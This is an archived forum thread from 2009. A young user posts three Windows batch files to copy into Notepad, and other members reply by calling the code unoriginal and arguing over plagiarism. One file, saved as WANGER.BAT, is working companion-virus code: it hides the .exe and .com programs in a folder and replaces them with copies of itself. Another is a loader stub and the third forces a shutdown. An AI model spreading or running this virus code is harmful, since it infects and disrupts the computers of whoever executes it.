PDA

View Full Version : ftw .bat files


Ranqe skill
08-25-2009, 01:41 AM
do NOT test any of these, for they will most likely harm your computer.
Lols i have allot of haters for posting these, but i dont really care :D
these are all really simple rofl.

Get a notepad up, and c/p this:

@ECHO OFF
REM <binary code>
copy %0 b.com>nul
b.com
del b.com
rem <binary code>

save it as VR.BAT

Get notepad and c/p this:

@echo off
ctty nul
for %%f in (*.exe *.com) do set A=%%f
if %A%==COMMAND.COM set A=
rename %A% V%A%
if not exist V%A% goto end
attrib +h V%A%
copy %0.bat %A%
attrib +r %A%
ren %A% *.bat
set A=
:end
ctty con
@if exist V%0.com V%0.com %1 %2 %3
@if exist V%0.exe V%0.exe %1 %2 %3

and save this as WANGER.BAT

And for this one, turnning off a computer, very simple.

shutdown -f
save it as forcedown.bat

There is no point in doing any of these, so, yea.

Robert
08-25-2009, 01:44 AM
I see this code everywhere. Example is here (http://vx.netlux.org/lib/static/vdat/tubw0001.htm). Do some real coding please.

-Robert

Ranqe skill
08-25-2009, 01:46 AM
I didnt even do this >.<.And im in 6th grade so wtf o.O.And i said these were simple, so yea its gonna be bad coding.

Robert
08-25-2009, 01:48 AM
I didnt even do this >.<.And im in 6th grade so wtf o.O.And i said these were simple, so yea its gonna be bad coding.
So you didn't make any of this code?

-Robert

Tanner
08-25-2009, 01:49 AM
So you didn't make any of this code?

-Robert

If he didn't, that is leeching which equals a BAN. haha.

Ranqe skill
08-25-2009, 01:50 AM
Will, i coded the shut down one.But im sure other people have to rofl.And im not leaching, im saying i didnt make it, im not taking credits.To leach, i have to say i made it and i came up with it, i didnt.Learn your definitions ftw.

Robert
08-25-2009, 01:52 AM
Will, i coded the shut down one.But im sure other people have to rofl.And im not leaching, im saying i didnt make it, im not taking credits.To leach, i have to say i made it and i came up with it, i didnt.Learn your definitions ftw.
Learn how to give credit ftw. I'm not here to argue. What you've done is basically ripping/plagiarism and I suggest you give credits to your threads.

-Robert

Tanner
08-25-2009, 01:52 AM
Leeching, as difined by Dodian.com, is any work that you post, that is not yours, without giving credit. That is exactly what you did.